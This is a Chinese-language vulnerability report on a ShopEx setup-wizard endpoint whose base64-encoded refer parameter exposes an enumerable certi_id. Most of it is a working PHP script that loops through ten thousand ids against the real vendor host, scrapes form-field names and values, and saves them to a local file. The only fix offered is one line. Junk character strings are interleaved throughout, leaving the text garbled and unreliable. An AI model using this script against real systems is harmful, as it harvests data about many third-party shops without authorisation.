|
|
简要描述:
0 v- ?, Y9 Z9 o+ \) m. p0 P: M3 {3 hShopEx某接口缺陷,可遍历所有网站
+ {+ U' a+ W6 ` f' G1 j, [, ], G详细说明:
! I8 y" z' R4 w0 O问题出现在shopex 网店使用向导页面
1 r: {: B! Q" S! q$ \3 T2 y2 z
) V6 u3 \7 l/ r0 A, K; C
. D& u' A; {; `4 [% ^( I5 e% i
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=0 `3 @* }; d# n+ t f; |
. O6 a+ u) d/ H2 R
: A( r! A+ K+ u7 ~$ n. y1 S& ?+ i$ r4 Z8 E. t1 K7 Z8 _; |
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}' F+ Q/ b8 `3 c) n p
+ ~: K% j @ x$ y. S
" ]8 X. E( j1 K' }2 D0 `8 M" ~4 Y9 F* _+ M! ~
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
. { L) Y- I* x9 F5 o* W. }& \2 X, x/ `& G) B8 T1 U, K) i
7 h5 ^, i# w0 w% j/ F% i; e
. |9 w: q& A- f' R* l% h2 L<?php: ?) j3 i0 T9 N
* p- z# Y0 }& q' e for ($i=1; $i < 10000; $i++) { //遍历, ?# c; @; P' E' w( Z; w
$ H4 p" R5 ]3 x% Q" Q- [, Y3 x
ShowshopExD($i);
- ~ a4 P- r0 V( Y5 g
+ B, Q' T& c/ n' n. c }- O; R" x* Q2 [! L! C$ W+ @
3 i g3 ?) U, ~$ k! R* F
function ShowshopExD($cid) {
! A. V, S, `1 s; ^( m# w+ t) S, m- S, U9 Y5 l9 \! e
$url='http://guide.ecos.shopex.cn/step2.php';
+ N# w/ I* J ]; W& q* [! T8 Q" {: Z. Z% h1 z, K8 x( @% y
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');9 _" U3 C/ I% w: R
9 i' a9 M P; |/ I! |! U9 l
$url = $url.'?refer='.$refer;
* f- ~2 @5 \. ^/ o/ w* M L5 j" u) Z2 ]8 K7 D7 j0 u$ G+ J' n Z
$ch = curl_init($url);
' {8 @" l% K9 T5 M6 P* y! L$ D! m) Z4 ]7 x& S* o
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
. B9 Q6 O1 U# E5 [ L& j- B; l- Q1 r7 U8 Z, y* ~
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;" H& R+ N b/ V) c: {
0 \- z8 Z$ h$ `
$result = curl_exec($ch);
& ]1 v* _, l" {+ V! V: y, s7 k, J5 R$ e# n: {' h2 {) W
$result = mb_convert_encoding($result, "gb2312", "UTF-8");1 Q$ C7 `; a( r( {$ V5 ~& m
/ B9 b: }5 L5 J$ r, S: E6 y
if(strpos($result,$refer))
- Q) ?- X2 R' Q' X3 n# ?+ M* S
3 D a2 b; Z9 O/ y {$ J: T Y5 q/ w- n/ @
7 ^- N( V# ^! f' o" Z v0 R
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件, ^! q) p/ H8 {4 Y. k7 S
- u% y6 L5 C, q, u$ X1 E) X/ @
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);0 `2 ]& i' Q( z4 ]0 k9 ?
! a+ ~1 ~# L* d3 n2 F- s. ~
foreach ($value[1] as $key) {
6 _% H) m5 s1 g3 H$ D: s
" R; }3 Q/ I5 W l8 @" Q- A! m preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
' w8 R4 O2 r. r( p/ s ~3 A9 \
: W$ ?% l4 O3 D( N echo $res[1][0].':'.$res[3][0]."\r\n";
9 l& n2 d+ L4 D. f) L1 Y* w$ v1 o# Y
$col =$res[1][0].':'.$res[3][0]."\r\n";
, |; }3 c# P- n( A& w# p! b. a+ [# p! f/ M. V* f8 E$ f! q
fwrite($fp, $col, strlen($col)); u7 l4 ^ c" h6 }$ M8 [
- e! e% ^9 h9 }9 V }
* `$ M$ w, n) S; ]8 Y+ k; e! \ W/ C% Q l
echo '--------------------------------'."\r\n";1 s! s4 K8 b; d+ o3 c* \6 V
( K9 i" Y3 ~& e% F
fclose($fp);
) L5 G; p! E4 Y8 @: r3 }! w( f+ ~* w1 F' }. w4 C2 [
}
6 O- [# K% h; [; U* e, ^: y7 e1 [# V) ^- `/ \- m$ o, y
flush();
3 p5 j* t8 M- b3 [6 p! y. A1 n3 p* o0 m1 {6 a V( I
curl_close($ch);. c8 Y; k; C! j x2 R5 G4 }
4 W# j6 y' s0 `3 q } C' d1 N! w- b" @" P: v
" U6 e" v" z. i# X8 U5 i?>
3 {/ q- `# i% z0 i5 F8 h漏洞证明:
$ W9 E( `; f* |- i! j8 C) e% X- yhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg" {; F% Z& V% T2 @
refer换成其他加密方式; o, o0 ?; I7 b% ~8 a9 ?
|
|